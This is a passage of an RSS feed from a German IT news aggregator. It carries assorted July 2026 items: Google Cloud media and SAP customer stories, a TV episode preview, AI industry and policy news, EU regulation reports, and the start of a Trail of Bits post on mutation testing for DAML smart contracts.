temporary increase in consumption—driven by specific formats such as news. But that consumption returned to pre-lockdown levels as restrictions were lifted in certain regions. </p><p>By contrast, many streaming subscription services saw consistent increased adoption. Nine percent of U.S. households took up a new SVOD service in Q2 2020.<sup>1</sup> The surge in streaming consumption seems to be more resilient than its linear counterpart, as U.S. time spent with streaming services in June 2020 was roughly 50 percent above its 2019 level.<sup>2</sup></p><p></p><p>In contrast to the Pay TV bundle, today’s streaming audiences have access to much more choice and freedom in their entertainment options. These viewers have shown both a preference to stack multiple services and a higher propensity to churn. As the pandemic affects discretionary spending across the world, audiences will look to save on entertainment costs, making SVOD services more attractive than traditional Pay TV bundles, as well as driving an increased adoption of AVOD services. </p><p>As a result, media organizations need to reassess how to streamline existing broadcast operations and costs. They must invest in building technology platforms that can handle unpredictable streaming demand seamlessly, while also deriving deeper audience insights from their data in order to drive audience engagement, retention, and monetization. For example, leading British broadcaster <a href="https://cloud.google.com/customers/itv">ITV</a>  built a video analytics solution on Google Cloud so they could better monitor events on their VOD service, ITV Hub.</p><p><b>2. Produce new content remotely and maximize the value of library content</b></p><p>While distribution channels may change, content still remains the industry’s crown jewel. Content breadth, exclusivity, and original content are the top three reasons that audiences adopt streaming services, and maximizing the value of both library and new content has never been more critical.</p><p>Content production has also been disrupted by the pandemic. Physical productions have paused across the world, only slowly starting to resume once again. And for content that has made it through the complex post-production process, the global shuttering of theatrical exhibition has forced many blockbuster titles to debut on streaming services—radically altering windowing strategies and the economic models that come with it. </p><p></p><p>Media companies have resorted to boundless creative strategies to keep content production lines open. Formats that can be created remotely such as animation are experiencing a boom, and live events such as news and sports have established new remote working processes in record time. </p><p>Content production has been on the rise for years, but the temporary halt in production has been a silver lining for media companies; this pause has presented an opportunity to step back and implement more digital, collaborative, streamlined, and global production and management processes, supported by the cloud. Media companies like <a href="https://www.youtube.com/watch?v=UwHcdmqXw8c" target="_blank">ViacomCBS</a> have also accelerated the digitization and enrichment of their extensive back catalogs and archives, to help fill the content gap. </p><p></p><p><b>3. Reimagine the workplace for the future of productivity</b></p><p>Finally, the biggest challenge many companies and industries face has been the shift to remote work. Innovative companies like <a href="https://youtu.be/87OzMmP2e0g" target="_blank">Yahoo Finance</a>, for example, utilized our video conferencing solution to keep their broadcast team’s content flowing and audiences engaged. 150 of Yahoo Finance’s editors, reporters, and anchors used Google Meet to deliver news and video streams on air from locations across the U.S. and London to tens of millions of viewers live, transitioning to a 100 percent remote broadcast model overnight. </p><p>As the industry navigates a new working norm, many media company offices will require thoughtful consideration of which tasks can be automated or done remotely, and exactly how much real estate is required to maintain operations. <br><br>Decisions are likely to be different by functions. Post-production staff, visual effects artists, and video editors can utilize <a href="https://www.youtube.com/watch?v=VjeRdQ9X5Vg" target="_blank">virtual workstations</a> and editing applications to complete their work remotely, while central teams such as finance, sales, and marketing can utilize video conferencing services like Meet to stay connected no matter where they are. But some essential personnel—lightweight studio production teams and on- prem playout teams—will need to still come into the office.<br><br><b>Continued innovation in the face of unprecedented change<br></b><br>Many media and entertainment companies are choosing Google Cloud operations modernization—all to thrive and remain relevant within this new era. For example, Major League Baseball adopted <a href="https://cloud.withgoogle.com/next/sf/sessions?session=APP228#business-application-platform" target="_blank">Anthos</a> as the vehicle to run their applications anywhere, utilized BigQuery to upgrade their <a href="https://technology.mlblogs.com/introducing-statcast-2020-hawk-eye-and-google-cloud-a5f5c20321b8" target="_blank">Statcast</a> platform, and launched new fan friendly initiatives like <a href="https://www.mlb.com/news/mlb-film-room-launch" target="_blank">Film Room</a> using our machine learning technologies—all in the service of becoming more agile and delivering more innovative fan experiences in a competitive media ecosystem. <br></p><p>This year has been one of unexpected and accelerated change for all, but the ingenuity, innovation, and determination of media companies to continue delivering critical news, information, and entertainment to audiences across the world has been extraordinary. Google Cloud is committed to bringing forward technologies that the media industry needs and to partner with our customers to help them continue to innovate in the face of unprecedented challenges. </p><p></p><p>To learn more, read our guide,<a href="https://inthecloud.withgoogle.com/media-transformation-during-covid/dl-cd.html?utm_source=google&amp;utm_medium=email&amp;utm_campaign=-&amp;utm_content=mediapageevolution" target="_blank"> Accelerated Media Evolution In The Time Of COVID</a>, or join us at one of our<a href="https://inthecloud.withgoogle.com/media-transformation-during-covid/dl-cd.html?utm_source=google&amp;utm_medium=email&amp;utm_campaign=-&amp;utm_content=mediapageevolution" target="_blank"> Media OnAir</a> events.</p><hr><p><i><sup>Sources:</sup></i></p><i><sup>1. Kantar, <a href="https://www.kantarworldpanel.com/global/News/Amazon-tops-Disney-Netflix-with-surge-in-video-service" target="_blank">Amazon tops Disney, Netflix with surge in video service</a> (August 2020)<br>2. Nielsen; The Hollywood Reporter, <a href="https://www.hollywoodreporter.com/live-feed/quarantine-tv-ratings-spike-is-1299998" target="_blank">The Quarantine TV Ratings Spike Is Over</a> (June 2020)</sup></i></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rémy Cointreau drives customer centricity with SAP on Google Cloud]]></title>
<description><![CDATA[Imagine the challenge of supply chain planning and meeting changing consumer needs when you have products that can take up to one-hundred years to produce. That’s the case for Rémy Cointreau, a family-owned maker of fine spirits whose roots go back to 1724. With rapidly evolving consumer expectat...]]></description>
<link>https://tsecurity.de/de/3662845/it-security-nachrichten/rmy-cointreau-drives-customer-centricity-with-sap-on-google-cloud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662845/it-security-nachrichten/rmy-cointreau-drives-customer-centricity-with-sap-on-google-cloud/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>Imagine the challenge of supply chain planning and meeting changing consumer needs when you have products that can take up to one-hundred years to produce. That’s the case for <a href="https://www.remy-cointreau.com/en/" target="_blank">Rémy Cointreau</a>, a family-owned maker of fine spirits whose roots go back to 1724. </p><p>With rapidly evolving consumer expectations and heavy competition from premium beverage brands, Rémy Cointreau set out on a strategy to put the customer at the center of their business. Offering more than a premium beverage, <a href="https://www.remy-cointreau.com/en/brands/" target="_blank">key brands</a> such as Rémy Martin cognac, Louis XIII cognac, Cointreau and St-Rémy brandy instead would offer customers a taste of luxury. “The idea is not to simply sell Cognac,” explains Sebastien Huet, the company’s CTO. “We want to sell a French way of living. For that, we needed to shift from selling products to selling an experience.”</p><p>To make this a reality, Rémy Cointreau realized all elements of its business would need to be more agile. It needed more flexibility in its SAP systems, which drive Finance, Manufacturing and Supply Chain, and easy access to valuable SAP system data for business decision making and innovative customer approaches. As a result, Rémy Cointreau determined they’d need to move to the cloud to enable such a transformation. </p><p>First, Rémy Cointreau elicited the help of long-time partner <a href="https://www.oxya.com/services/managed-cloud-services/google-cloud/" target="_blank">oXya</a>. The Rémy Cointreau/oXya collaboration dates back 10 years, including the move of the on-prem SAP environment to oXya where they provided managed services. oXya deeply understood the pain points of Rémy Cointreau’s SAP landscape and worked with the company to capture and translate their business and functional requirements, followed by benchmarking various cloud solutions. Rémy Cointreau’s business was spread over two SAP landscapes, with interface and data consistency challenges, which needed to be unified to one SAP system and migrated to S/4HANA. Choosing the right cloud platform was critical to drive the SAP environment to deliver more value. </p><p>“Scalability, flexibility and cost savings were important to Rémy Cointreau but also they had a strong desire to focus on data aspects beyond SAP,” says Matthieu Petitprez, Deputy Chief Technology Officer, oXya, a Hitachi Group Company. “<a href="https://cloud.google.com/solutions/sap">Google Cloud</a>, with its specific data analysis and management tools, completely met this objective. It allows integration of SAP with <a href="https://cloud.google.com/bigquery">BigQuery </a>and artificial intelligence services, bringing more value to the SAP solution.” </p><p>“Just as it takes years to create a great cognac, we value partners who will be by our side for a long time,” says Huet, noting that it’s not unusual for the company to enter into 30- or 40-year agreements with suppliers. “The strategic alliance between Google Cloud and SAP made us confident they were the right choice for us. Google Cloud has a more comprehensive strategic partnership with SAP than its competitors and is clearly adding value to SAP.” </p><p>Although the pandemic forced them to drive the migration remotely, Rémy Cointreau, oXya and Google Cloud’s Professional Services Organization (PSO) collaborated to achieve the European operations go-live in April 2020. “I was worried that COVID-19 would delay our launch, but migration was fast, easy, and on-schedule,” says Mr. Huet. “The technology played a part, but it also helped that we had two partners who we believed in.”</p></div>
<div class="block-paragraph"><h3>Improved manufacturing and service with business agility</h3><p>The SAP S/4HANA deployment on Google Cloud Platform is now live for Rémy Cointreau’s Europe based operations. In addition to S/4, it also migrated the SAP supply chain planning tool, Advanced Planner and Optimizer (APO), as well as SAP’s Business Warehouse to Google Cloud. Similar deployments will launch soon globally. </p><p>While the environment is still new, Rémy Cointreau already sees big steps towards greater agility with Google Cloud. For instance, Google Cloud makes it much faster and easier to adjust the technical operating environment. If a team wants to start performing a new resource-heavy analysis, Rémy Cointreau can expand capacity to meet demands within minutes. The team can also roll back capacity so that it is only using the resources it needs.</p><p>This newfound agility takes the pressure off the IT team when it comes to provisioning a new implementation for future capacity. Rather than try to build capacity for potential peaks, the team can deploy for expected demand, then easily adjust afterward to compensate for actual loads. “It makes capacity planning so much easier,” Mr. Huet says. “Not long after go-live, we had to perform some updates—increasing memory and so on,” he recalls. “In the past, the process would take about a month to do. Now it takes a few minutes. We literally went from five weeks to five minutes. This is a tremendous improvement.” </p><p>Another critical factor in Rémy Cointreau’s decision to move to Google Cloud was the ability to connect its SAP backbone to key SaaS applications such as Salesforce. As the company began to put more focus on the customer experience, creating strong, long-term relationships with customers would be essential. By being able to create this 360 degree view of data among SAP, Salesforce, and its ecommerce platform, Rémy Cointreau can more easily create personalized experiences for its customers that simply weren’t possible before.</p><h3>A data-driven future</h3><p>Rémy Cointreau business users are already reaping benefits from the cloud deployment. “One of the key improvements is the ability to analyze live data,” Huet says. “That was not the case in the past. Previously, there was a 24-hour lag between the time the data came in and the moment it could be analyzed. This is especially important on the production-management side, where every hour counts.” </p><p>As exciting as the improvements in agility and connectivity have been so far, Huet sees even more possibilities for the future. “Right now, we’re focused on establishing SAP in the Google Cloud environment,” he says. “But once that’s done, we’ll be looking at technologies like <a href="https://cloud.google.com/bigquery">BigQuery</a> that can take our data analysis to the next level.” Potential areas of interest include product traceability and customer experience. “Now that we’re fully deployed on Google Cloud Platform, anything is possible,” he notes. “We can pull data in from multiple sources via integration and analyze it in a matter of days. We don’t need a three-month project to see value.” </p><p>It is this agility and creativity that makes Huet most optimistic about the company’s partnership with Google Cloud. As he notes, “I think the best is yet to come.” </p><p>To learn more about Rémy Cointreau’s deployment of <a href="https://cloud.google.com/solutions/sap">SAP on Google Cloud</a>, read the case study <a href="https://cloud.google.com/customers/remy-cointreau">here</a>. Also learn more about <a href="https://www.oxya.com/services/managed-cloud-services/google-cloud/" target="_blank">oXya’s capabilities with Google Cloud for SAP customers</a>.</p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/products/sap-google-cloud/reports-examine-business-value-of-running-sap-on-google-cloud/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">SAP on Google Cloud: 2 analyst studies reveal quantifiable business benefits and ROI</h4>
            <p class="uni-related-article-tout__body">From uptime and infrastructure to efficiency and productivity—both Forrester and IDC identified major benefits to companies that have mad...</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Agent Kim Reactivated’ Episode 6 Release Date, Cast and What to Expect]]></title>
<description><![CDATA[Agent Kim Reactivated Episode 6 will be released on Saturday, July 11, 2026. The new episode continues Manager Kim’s dangerous search for his missing daughter as enemies connected to his hidden past close in on him.



Agent Kim Reactivated Episode 6 Release Details




Release date: Saturday, Ju...]]></description>
<link>https://tsecurity.de/de/3661263/ios-mac-os/agent-kim-reactivated-episode-6-release-date-cast-and-what-to-expect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661263/ios-mac-os/agent-kim-reactivated-episode-6-release-date-cast-and-what-to-expect/</guid>
<pubDate>Sat, 11 Jul 2026 06:52:50 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Agent Kim Reactivated Episode 6 will be released on Saturday, July 11, 2026. The new episode continues Manager Kim’s dangerous search for his missing daughter as enemies connected to his hidden past close in on him.



Agent Kim Reactivated Episode 6 Release Details




Release date: Saturday, July 11, 2026



Broadcast time: 9:50 p.m. KST



Streaming platform: Netflix



Korean network: SBS



Genre: Action, mystery and thriller



Expected duration: Around 80 minutes



Total episodes: 10



Release schedule: New episodes arrive every Friday and Saturday



Main cast: So Ji-sub, Choi Dae-hoon, Yoon Kyung-ho, Joo Sang-wook, Seo Su-min and Son Na-eun




The series airs between 9:50 p.m. and 11:10 p.m. in South Korea, while Netflix release times can vary by region. The first season runs from June 26 to July 25, 2026.



Where Is the Story Heading?



Spoilers ahead for Episode 5.



Episode 5 placed Manager Kim in another brutal confrontation with the agent pursuing him. However, the fight took an unexpected turn when Kim realised that his opponent was someone he knew from his earlier life.



Meanwhile, Min-ji refused to wait helplessly for someone to rescue her and instead attempted to escape. Her actions could bring her closer to freedom, although they could also alert the people holding her.



Episode 6 should explore the history between Manager Kim and the mysterious agent. Their connection could reveal more about Kim’s former missions, his enemies and the events that forced him to hide behind the life of an ordinary bank employee.



What to Expect From Episode 6



Manager Kim has support from Sung Han-soo and Park Jin-cheol, two fellow fathers who also have experience as former secret agents. Their involvement has expanded the rescue mission and given the show more room for coordinated action scenes.



However, Kim’s decision to use his old skills has placed him on the radar of several powerful groups. The closer he gets to Min-ji, the harder it becomes to protect the quiet identity he built in South Korea.



Episode 6 will likely focus on Min-ji’s escape attempt, Kim’s reunion with his former associate and the wider conspiracy surrounding the kidnapping. It should also move the season into its second half, with only four episodes remaining after this instalment.



Agent Kim Reactivated Episode 6 arrives on Netflix on July 11. What do you plan to watch this weekend? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Tencent moves to buy majority stake in Manus after Beijing forced Meta to unwind its $2 billion deal]]></title>
<description><![CDATA[Tencent is in talks to buy a majority stake in AI agent startup Manus at the same $2 billion valuation, according to the Financial Times, after Beijing blocked Meta's acquisition. Tencent sees overlap with its own agent plans, including for WeChat. U.S. firm Benchmark is not expected to take part...]]></description>
<link>https://tsecurity.de/de/3660406/ai-nachrichten/tencent-moves-to-buy-majority-stake-in-manus-after-beijing-forced-meta-to-unwind-its-2-billion-deal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660406/ai-nachrichten/tencent-moves-to-buy-majority-stake-in-manus-after-beijing-forced-meta-to-unwind-its-2-billion-deal/</guid>
<pubDate>Fri, 10 Jul 2026 18:50:10 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1376" height="768" src="https://the-decoder.com/wp-content/uploads/2026/07/manus_tencent_meta.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        Tencent is in talks to buy a majority stake in AI agent startup Manus at the same $2 billion valuation, according to the Financial Times, after Beijing blocked Meta's acquisition. Tencent sees overlap with its own agent plans, including for WeChat. U.S. firm Benchmark is not expected to take part.</p>
<p>The article <a href="https://the-decoder.com/tencent-moves-to-buy-majority-stake-in-manus-after-beijing-forced-meta-to-unwind-its-2-billion-deal/">Tencent moves to buy majority stake in Manus after Beijing forced Meta to unwind its $2 billion deal</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Most Americans Have Tried AI But Over Half Think It Is Overhyped]]></title>
<description><![CDATA[A new survey reveals that almost everyone in the country has tested out artificial intelligence tools at least once over the past year. Despite this massive adoption rate, the actual enthusiasm for the new technology remains surprisingly low. A recent poll shows that while people find these digit...]]></description>
<link>https://tsecurity.de/de/3660006/ios-mac-os/most-americans-have-tried-ai-but-over-half-think-it-is-overhyped/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660006/ios-mac-os/most-americans-have-tried-ai-but-over-half-think-it-is-overhyped/</guid>
<pubDate>Fri, 10 Jul 2026 16:24:08 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new survey reveals that almost everyone in the country has tested out artificial intelligence tools at least once over the past year. Despite this massive adoption rate, the actual enthusiasm for the new technology remains surprisingly low. A recent poll shows that while people find these digital assistants helpful for basic daily tasks, a large portion of the public believes the entire trend is completely overblown.



Most users rely on the tools daily but refuse to pay



According to the latest survey data, 96 percent of Americans have tried AI at some point, and 86 percent still use it on a regular basis. People mostly rely on these platforms to search for information, compare different products, and plan their daily schedules. Interestingly, more than one in five users admit to talking to chatbots simply for companionship or to vent about their day.



Even with so many daily active users, the general attitude toward the technology is mixed. A slim majority of 51 percent think artificial intelligence is getting way too much hype. The concerns go even deeper, as 77 percent believe these tools make humans lazier, and 57 percent worry that relying on software weakens our critical thinking skills over time.



Because of these doubts, very few people are willing to open their wallets. Only 26 percent of current users actually pay for a subscription. The survey noted that 54 percent of people would abandon the tools completely if they were forced to pay a monthly fee.



While tech companies continue to launch new software, the average consumer clearly prefers to keep their money and invest in real human workers instead.]]></content:encoded>
</item>
<item>
<title><![CDATA[EU Rules Will Not Force Removable iPhone Battery Doors In 2027]]></title>
<description><![CDATA[Despite what you might see in viral social media posts, iPhones sold in the European Union will not feature a removable back panel for easy battery replacements. Rumors constantly claim that upcoming laws will force major design changes by the year 2027, but this information is simply incorrect. ...]]></description>
<link>https://tsecurity.de/de/3659800/ios-mac-os/eu-rules-will-not-force-removable-iphone-battery-doors-in-2027/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659800/ios-mac-os/eu-rules-will-not-force-removable-iphone-battery-doors-in-2027/</guid>
<pubDate>Fri, 10 Jul 2026 15:10:27 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Despite what you might see in viral social media posts, iPhones sold in the European Union will not feature a removable back panel for easy battery replacements. Rumors constantly claim that upcoming laws will force major design changes by the year 2027, but this information is simply incorrect. The tech giant already meets the strict new legal requirements without needing to alter how its phones are built.



Viral internet rumors about removable batteries are completely false



Recent videos and online discussions claim that the European Union is going to force Apple to bring back user-replaceable batteries in a few years. These posts suggest that future models will feature a removable plastic or glass door, allowing anyone to easily swap a dead battery without visiting a repair shop.



While the European Union does have a new battery law taking effect in 2027, the claims about a forced hardware redesign are wrong. The company has a long history of fighting with European regulators over things like charging ports and artificial intelligence, but it has an easy out in this specific situation.



The upcoming regulation demands easy battery swaps for most smartphones



The current confusion stems from a very real piece of legislation called Commission Regulation 2023/1670. This new rule specifically targets smartphones and tablets, stating that their batteries must be readily removable and replaceable by the user.



The law requires that an average adult consumer should be able to swap out the power cell without needing any highly specialized tools. At first glance, this sounds like a massive problem for the sealed glass iPhone, leading people to assume a completely redesigned product is coming to Europe in 2027.



A special exemption clause protects water resistant and premium devices



If you read deeper into the text of the law, there is a clear exemption clause that applies directly to premium smartphones. If a phone is designed to be highly water resistant and its battery can retain a high percentage of its original capacity after hundreds of charge cycles, it does not need a removable back panel.



Because the company already builds highly water resistant phones with long lasting batteries that meet these exact cycle standards, it easily bypasses the removable door requirement. Buyers expecting a return to the days of popping off a plastic back cover to swap a battery will be very disappointed, as the current sealed design is perfectly legal.]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta risks $12B EU fine over addictive Instagram and Facebook feeds]]></title>
<description><![CDATA[Meta is in breach of the EU's Digital Services Act (DSA), a preliminary investigation has found, over the "addictive" design of Instagram and Facebook. It's likely to be forced to redesign both apps, and could face a fine of up to $12 billion. The European Commission said Meta "did not adequately...]]></description>
<link>https://tsecurity.de/de/3659468/it-nachrichten/meta-risks-12b-eu-fine-over-addictive-instagram-and-facebook-feeds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659468/it-nachrichten/meta-risks-12b-eu-fine-over-addictive-instagram-and-facebook-feeds/</guid>
<pubDate>Fri, 10 Jul 2026 13:03:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Meta is in breach of the EU's Digital Services Act (DSA), a preliminary investigation has found, over the "addictive" design of Instagram and Facebook. It's likely to be forced to redesign both apps, and could face a fine of up to $12 billion. The European Commission said Meta "did not adequately assess the risks of […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Lawmakers Probe Growing Use of Chinese AI Models In US Companies]]></title>
<description><![CDATA[U.S. lawmakers are probing the growing use of Chinese AI models by American companies, citing concerns over censorship, security risks, and whether U.S. firms are turning to cheaper foreign models because domestic alternatives are too costly or restricted. The investigation is specifically lookin...]]></description>
<link>https://tsecurity.de/de/3658389/it-security-nachrichten/lawmakers-probe-growing-use-of-chinese-ai-models-in-us-companies/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658389/it-security-nachrichten/lawmakers-probe-growing-use-of-chinese-ai-models-in-us-companies/</guid>
<pubDate>Fri, 10 Jul 2026 01:07:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[U.S. lawmakers are probing the growing use of Chinese AI models by American companies, citing concerns over censorship, security risks, and whether U.S. firms are turning to cheaper foreign models because domestic alternatives are too costly or restricted. The investigation is specifically looking at companies such as Cursor and Airbnb. "The growing use of Chinese AI models by U.S. companies raises serious concerns," a State Department spokesperson told CNBC. Those "AI models are designed to advance Beijing's narratives, censor dissent, and reflect CCP ideology and values." CNBC reports: The House Committee on Homeland Security and the House Select Committee on China said in April they will jointly investigate the growing adoption of Chinese-developed AI models. An initial step in the probe was for the chairmen of those committees to send letters to Cursor and Airbnb, over their "use of or exposure to these risks" through AI developed in China. "The Chinese Communist Party is no longer just nipping at our heels in artificial intelligence; it is racing to close the gap in some of the exact capabilities that will shape the future of cybersecurity," Andrew Garbarino, chairman of the U.S. House Committee on Homeland Security, told CNBC. "Recent reporting that a Chinese open-weight model can match leading U.S. models in certain vulnerability discovery and cybersecurity tasks is highly alarming," said Garbarino.
 
While some government departments have banned the usage of Chinese AI models including DeepSeek, adoption of them by U.S. companies is not prohibited. Tech chiefs, including crypto company Coinbase's Brian Armstrong and AI startup Lindy's Flo Crivello, have been publicly touting the use of models from China to reduce costs. Cursor, which will be acquired by Elon Musk's SpaceX for $60 billion, built its Composer 2 model using Chinese AI model Kimi, which was developed by Moonshot AI. Alongside focusing on the rise of Chinese AI models, the ongoing joint House Committees' investigation is also looking into whether the U.S. is doing enough to tackle their rise. "The Committees are also examining whether the United States has a sufficient open-weight AI strategy to ensure American companies and cyber defenders are not forced to choose between expensive or restricted U.S. models and cheap, capable PRC-developed alternatives," a Committee aide, who asked not to be named as they were not authorized to discuss the ongoing probe, told CNBC.
 
[...] The administration could consider the use of federal procurement bans, which would include restricting government agencies and private companies that serve the U.S. government from using Chinese AI models, Kyle Chan, fellow in the John L. Thornton China Center at think tank Brookings, told CNBC. "However, it's ultimately impossible to ban China's open-source AI models because their model weights are available freely on the internet," Chan added. "This could enter into first amendment speech issues." [...] Another [approach] could be disseminating findings about risks and vulnerabilities associated with Chinese AI models to U.S. companies. "Regardless, I do expect both the Executive Branch and Congress to communicate their interest not to see U.S. companies adopting these models," [said Daniel Remler, senior fellow, technology and national security program at think tank the Center for a New American Security (CNAS), told CNBC].<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Lawmakers+Probe+Growing+Use+of+Chinese+AI+Models+In+US+Companies+%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F09%2F1947218%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F09%2F1947218%2Flawmakers-probe-growing-use-of-chinese-ai-models-in-us-companies%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/09/1947218/lawmakers-probe-growing-use-of-chinese-ai-models-in-us-companies?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Can AI equalize political campaign ads – or will it remain a tool for spreading lies?]]></title>
<description><![CDATA[Political campaigns are increasingly deploying AI and deepfakes to further their messaging, and the scale of spread has experts concerned From the comfort of his bed, Jonathan Rinaldi, a political candidate for a city council seat in Queens, New York, tinkered away on his iPhone, prompting an art...]]></description>
<link>https://tsecurity.de/de/3654370/ai-nachrichten/can-ai-equalize-political-campaign-ads-or-will-it-remain-a-tool-for-spreading-lies/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654370/ai-nachrichten/can-ai-equalize-political-campaign-ads-or-will-it-remain-a-tool-for-spreading-lies/</guid>
<pubDate>Wed, 08 Jul 2026 15:04:30 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Political campaigns are increasingly deploying AI and deepfakes to further their messaging, and the scale of spread has experts concerned </p><p>From the comfort of his bed, Jonathan Rinaldi, a political candidate for a city council seat in Queens, New York, tinkered away on his iPhone, prompting an artificial intelligence chatbot to mock up fake news hits and endorsements he had never received.</p><p>During the campaign last October, Rinaldi shared one of those stories, made to appear real with a CNN logo, on his Facebook and Instagram. It stated that Lynn Schulman, his opponent and an incumbent Democrat, had been “forced to drop out of the race due to a series of critical mistakes”. But Schulman had not quit her campaign, and in November, won by a landslide.</p> <a href="https://www.theguardian.com/technology/2026/jul/08/ai-ads-political-campaigns">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mutation testing comes to DAML]]></title>
<description><![CDATA[In April we released Mewt, our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DA...]]></description>
<link>https://tsecurity.de/de/3654082/it-security-nachrichten/mutation-testing-comes-to-daml/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654082/it-security-nachrichten/mutation-testing-comes-to-daml/</guid>
<pubDate>Wed, 08 Jul 2026 13:08:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In April we released <a href="https://blog.trailofbits.com/2026/04/01/mutation-testing-for-the-agentic-era/">Mewt</a>, our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DAML’s authorization primitives), and runs them through your existing test suite to count how many mutants survive. If you want to try it, simply install Mewt from the <a href="https://github.com/trailofbits/mewt">repository</a>, point a <code>mewt.toml</code> at your project and its test command, and use <code>mewt run</code>.</p>
<p>For a team shipping DAML to production, that count is what a passing test run is actually worth: it puts a number on how much your suite checks, whereas a green run on its own does not.</p>
<h2>Why DAML’s coverage reports lie</h2>
<p>Test coverage is the most reassuring lie in smart-contract development. Hitting 100% line coverage tells you the test runner walked the code; it does not tell you whether any test would fail if that code stopped doing what it is supposed to. We have been grading test harnesses by how many mutants they kill since at least <a href="https://blog.trailofbits.com/2019/01/23/fuzzing-an-api-with-deepstate-part-2/">2019</a>, and <a href="https://blog.trailofbits.com/2025/09/18/use-mutation-testing-to-find-the-bugs-your-tests-dont-catch/">our primer on finding the bugs your tests don’t catch</a> shows how a green suite can still miss the bug that matters.</p>
<p>DAML’s built-in coverage measures execution at the template and choice level: which templates were created and which choices were exercised over the test run. It reports whether each choice was exercised, not what happened inside it. A test that exercises a choice once and asserts nothing about the result reports that choice as covered. The report prints the same green percentage whether the test verifies the outcome or discards it.</p>
<h2>How mutation testing works</h2>
<p>Instead of asking whether your tests reached the code, mutation testing grades your tests by sabotaging that code. The engine generates mutants, copies of the code that each carry one small deliberate change: a flipped comparison, a removed branch, a dropped party. It then runs your test suite against each one. A mutant that makes the suite fail is caught; a mutant that passes every test survives. Every survivor is a change your tests let through, and each one is either harmless or a potential bug. The harmless ones are equivalent code no test could distinguish or a branch no execution reaches, and you can set those aside. The rest are a to-do list: each one is a specific test you are missing, a case your suite should check but does not, occasionally with a real bug sitting behind the gap. The primer above describes a real audit where a mutation campaign surfaced a high-severity bug that the project’s tests had missed.</p>
<h2>Mutation testing forces the unhappy path</h2>
<p>A DAML contract encodes rights and obligations between named parties: who holds what, who owes what to whom, and who must authorize each step. A party is not an anonymous address. It represents a real organization or person, and the contract is the rulebook for how those parties interact, including which of them can take which action, what each is allowed to see, and what stays private between them.</p>
